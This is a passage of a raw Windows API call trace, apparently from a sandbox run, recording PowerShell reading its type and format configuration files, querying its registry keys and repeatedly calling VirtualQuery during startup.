lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.224] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.225] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.225] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.226] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.226] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.227] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1b4, lpOverlapped=0x0) returned 1 [0090.227] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x0, lpOverlapped=0x0) returned 1 [0090.227] CloseHandle (hObject=0x344) returned 1 [0090.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0090.227] SetErrorMode (uMode=0x1) returned 0x1 [0090.228] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d6a0 | out: lpFileInformation=0x16d6a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0090.228] SetErrorMode (uMode=0x1) returned 0x1 [0090.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0090.228] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d788 | out: phkResult=0x16d788*=0x344) returned 0x0 [0090.228] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d70c, lpData=0x0, lpcbData=0x16d708*=0x0 | out: lpType=0x16d70c*=0x1, lpData=0x0, lpcbData=0x16d708*=0x56) returned 0x0 [0090.228] CoTaskMemAlloc (cb=0x5a) returned 0x2718f0 [0090.228] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d6dc, lpData=0x2718f0, lpcbData=0x16d6d8*=0x56 | out: lpType=0x16d6dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d6d8*=0x56) returned 0x0 [0090.228] CoTaskMemFree (pv=0x2718f0) [0090.228] RegCloseKey (hKey=0x344) returned 0x0 [0090.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0090.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0090.476] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.489] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.493] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.494] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.494] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.495] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.496] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.502] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.514] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.514] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.515] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.515] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.515] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.516] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.517] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.518] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.525] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.530] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.531] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.532] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.533] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.534] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.535] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.535] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.536] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.537] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.538] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.538] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.538] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.539] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.545] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.551] VirtualQuery (in: lpAddress=0x16c480, lpBuffer=0x16d340, dwLength=0x30 | out: lpBuffer=0x16d340*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.552] VirtualQuery (in: lpAddress=0x16c480, lpBuffer=0x16d340, dwLength=0x30 | out: lpBuffer=0x16d340*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.552] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.555] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.608] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.609] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.609] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.616] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0090.616] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.616] CoTaskMemFree (pv=0x2e4450) [0090.629] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.638] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.640] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.641] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.642] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.643] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.643] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.647] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.650] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.651] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d928 | out: phkResult=0x16d928*=0x310) returned 0x0 [0090.651] RegQueryValueExW (in: hKey=0x310, lpValueName="path", lpReserved=0x0, lpType=0x16d93c, lpData=0x0, lpcbData=0x16d938*=0x0 | out: lpType=0x16d93c*=0x1, lpData=0x0, lpcbData=0x16d938*=0x74) returned 0x0 [0090.651] RegQueryValueExW (in: hKey=0x310, lpValueName="path", lpReserved=0x0, lpType=0x16d8ac, lpData=0x0, lpcbData=0x16d8a8*=0x0 | out: lpType=0x16d8ac*=0x1, lpData=0x0, lpcbData=0x16d8a8*=0x74) returned 0x0 [0090.651] CoTaskMemAlloc (cb=0x78) returned 0x281930 [0090.651] RegQueryValueExW (in: hKey=0x310, lpValueName="path", lpReserved=0x0, lpType=0x16d87c, lpData=0x281930, lpcbData=0x16d878*=0x74 | out: lpType=0x16d87c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d878*=0x74) returned 0x0 [0090.651] CoTaskMemFree (pv=0x281930) [0090.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0090.652] SetErrorMode (uMode=0x1) returned 0x1 [0090.652] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d800 | out: lpFileInformation=0x16d800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0090.652] SetErrorMode (uMode=0x1) returned 0x1 [0090.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0090.653] SetErrorMode (uMode=0x1) returned 0x1 [0090.654] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d800 | out: lpFileInformation=0x16d800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0090.654] SetErrorMode (uMode=0x1) returned 0x1 [0090.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0090.654] SetErrorMode (uMode=0x1) returned 0x1 [0090.654] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d800 | out: lpFileInformation=0x16d800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0090.654] SetErrorMode (uMode=0x1) returned 0x1 [0090.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0090.654] SetErrorMode (uMode=0x1) returned 0x1 [0090.655] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d800 | out: lpFileInformation=0x16d800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0090.655] SetErrorMode (uMode=0x1) returned 0x1 [0090.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0090.655] SetErrorMode (uMode=0x1) returned 0x1 [0090.655] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d800 | out: lpFileInformation=0x16d800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0090.655] SetErrorMode (uMode=0x1) returned 0x1 [0090.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0090.655] SetErrorMode (uMode=0x1) returned 0x1 [0090.656] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d800 | out: lpFileInformation=0x16d800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0090.656] SetErrorMode (uMode=0x1) returned 0x1 [0090.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d5f0, lpFilePart=0x0 | out: 